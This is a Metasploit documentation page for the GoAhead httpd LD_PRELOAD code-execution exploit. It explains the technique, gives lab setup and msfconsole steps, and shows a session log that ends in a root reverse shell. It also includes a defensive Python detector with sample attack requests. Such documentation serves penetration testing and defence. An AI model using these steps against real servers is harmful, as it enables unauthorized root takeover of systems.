metasploit-gs/documentation/modules/exploit/linux/http/goahead_ldpreload.md
2017-12-28 14:00:03 -06:00

Vulnerable Application

The GoAhead httpd server, versions 2.5 through 3.6.4, is vulnerable to an arbitrary code execution vulnerability in which a remote attacker can force a supplied shared library to be loaded into the process of a CGI application. This module delivers a shared library payload as the raw body of a POST request and forces it to be loaded by specifying an LD_PRELOAD value of /proc/self/fd/0.
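For defenders, the request shape described above is easy to recognise in proxy or web-server logs that retain the request target and body. The following added example (not part of the module or of GoAhead) inspects constructed HTTP requests for the three markers that characterise this technique: a CGI endpoint, a dynamic-linker variable such as LD_PRELOAD supplied as a request parameter, a value pointing at /proc/self/fd/, and a POST body that begins with the ELF magic bytes. It assumes the variable is carried in the query string; the sample requests are constructed, not captured traffic.

```python
from urllib.parse import parse_qsl, urlsplit

# Dynamic-linker variables no CGI request has a legitimate reason to set.
# LD_PRELOAD is the one the GoAhead module uses; the others are analogous.
LINKER_ENV_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}
ELF_MAGIC = b"\x7fELF"
CGI_PREFIX = "/cgi-bin/"  # CGI handler prefix used by the GoAhead test build


def inspect_cgi_request(method, target, body):
    """Return a list of findings for one request (method, request-target, raw body).

    An empty list means nothing about the request matches the LD_PRELOAD pattern.
    """
    findings = []
    parts = urlsplit(target)
    if not parts.path.startswith(CGI_PREFIX):
        return findings  # only CGI endpoints turn request data into a process environment
    # Environment variable names are case-sensitive on Linux, so match exactly.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in LINKER_ENV_VARS:
            findings.append(f"linker variable {name} supplied as a request parameter")
        if value.startswith("/proc/self/fd/"):
            findings.append(f"parameter {name} points at a process file descriptor ({value})")
    if method.upper() == "POST" and body[:4] == ELF_MAGIC:
        findings.append("POST body is an ELF object (shared library or executable)")
    return findings


def scan(requests):
    """Return {request-target: findings} for every request that produced at least one finding."""
    flagged = {}
    for method, target, body in requests:
        findings = inspect_cgi_request(method, target, body)
        if findings:
            flagged[target] = findings
    return flagged


# Constructed sample requests: a benign CGI call, the LD_PRELOAD pattern, and an
# ELF upload to a non-CGI path (ignored, since it never reaches a CGI environment).
SAMPLE_REQUESTS = [
    ("GET", "/cgi-bin/cgitest?name=alice", b""),
    ("POST", "/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0", ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9),
    ("POST", "/index.html?LD_PRELOAD=/proc/self/fd/0", ELF_MAGIC),
]

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS).items():
        print(target)
        for finding in findings:
            print("  -", finding)
```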

Kali 2017.3 and Ubuntu 16.04 Install Instructions

These instructions are based on the vulnerability analysis by elttam.com.au.

git clone https://github.com/embedthis/goahead.git
cd goahead/
git checkout tags/v3.6.4 -q
make > /dev/null
cd test
gcc ./cgitest.c -o cgi-bin/cgitest
sudo ../build/linux-x64-default/bin/goahead

Verification Steps

Example steps in this format (also in the PR):

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/goahead_cgi_exec
  4. Do: set rhost [ip]
  5. Do: exploit
  6. You should get a shell.

Options

TARGET_URI

Optional. The full path to a CGI endpoint on the target server.

Scenarios

GoAhead 3.6.4 on Ubuntu 16.04 x64

[*] Processing goahead.rc for ERB directives.
resource (goahead.rc)> use exploit/linux/http/goahead_cgi_exec
resource (goahead.rc)> set verbose true
verbose => true
resource (goahead.rc)> set rhost 127.1.1.1
rhost => 127.1.1.1
resource (goahead.rc)> check
<TBD>
resource (goahead.rc)> exploit
[*] Started reverse TCP handler on 127.1.1.1:4444
[*] Sending Exploit to /cgi-bin/cgitest
[*] Command shell session 1 opened (127.1.1.1:4444 -> 127.1.1.1:45762) at 2017-12-23 17:12:39 -0500
uname -a
Linux goahead 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

whoami
root